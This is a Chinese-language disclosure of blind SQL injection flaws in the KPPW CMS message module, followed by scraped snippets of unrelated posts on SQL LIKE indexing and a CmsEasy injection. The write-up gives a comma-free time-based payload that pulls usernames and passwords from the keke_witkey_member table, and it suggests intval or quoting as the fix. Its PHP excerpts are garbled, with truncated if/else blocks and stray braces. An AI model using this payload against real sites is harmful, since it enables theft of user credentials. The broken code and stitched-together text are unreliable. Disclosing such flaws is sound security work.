kppw最新版sql注入漏洞六,漏洞太多了,肯定是程式猿偷懶,沒有安全意識,導致多處盲注
這裡把同一模組的漏洞都提交到一起把,避免刷漏洞的嫌疑
sql注入一
檔案/control/user/message_notice.php
<?php defined ( 'in_keke' ) or exit('access denied');
$objmsgt = keke_table_class::get_instance ( 'witkey_msg' );
$strurl = 'index.php?do=user&view=message&op=notice';
$intpage and $strurl .= '&intpage=' . $intpage;
$intpagesize and $strurl .= '&intpagesize=' . $intpagesize;
if (isset ( $action )) else
break;
case 'delsingle' :
if ($objid) else
break;
case 'mulitview' :
if ($ckb)
}} else
kekezu::show_msg ( '設定成功', $strurl, null, null, 'ok' );
break;
}當action=mulitview時:
case 'mulitview' :
if ($ckb) else
}kekezu::show_msg ( '刪除成功', $strurl, null, null, 'ok' );
} else
break;
同樣在刪除時,del函式存在注入漏洞
還有就是引數ckb同樣通過intmsgid進入了sql語句,導致注入產生
但是這裡有乙個問題就是引數intmsgid不能有逗號,這樣會導致截斷,無法執行完整sql語句
這裡我們使用無逗號的語句即可:
and case when(mid((select group_concat(username,password) from keke_witkey_member) from 1 for 1)=char(97)) then sleep(5) else (0) endsqk注入一:
此處會延遲返回
sql注入二:
此處會延遲返回
看資料庫執行日誌:
加單引號保護或者使用intval即可
KPPW最新版SQL注入漏洞一
kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...
sql優化最新版
1 慎用like語句 1 where name like jack 索引失效 2 where name like jack 索引生效 3 where name like jack 索引失效 如果like 後面 在語句前面會導致索引失效 2 復合索引 糾錯 網上大部分論壇中的部落格都是錯誤的。user...
CmsEasy最新版SQL注入可獲取管理員賬戶
與 cmseasy最新版本無限制sql注射 重複 cmseasy 5.5 utf 8 20140420 官方最新包 檔案 lib default archive act.php 在提交訂單時 function orders action if front post telphone front po...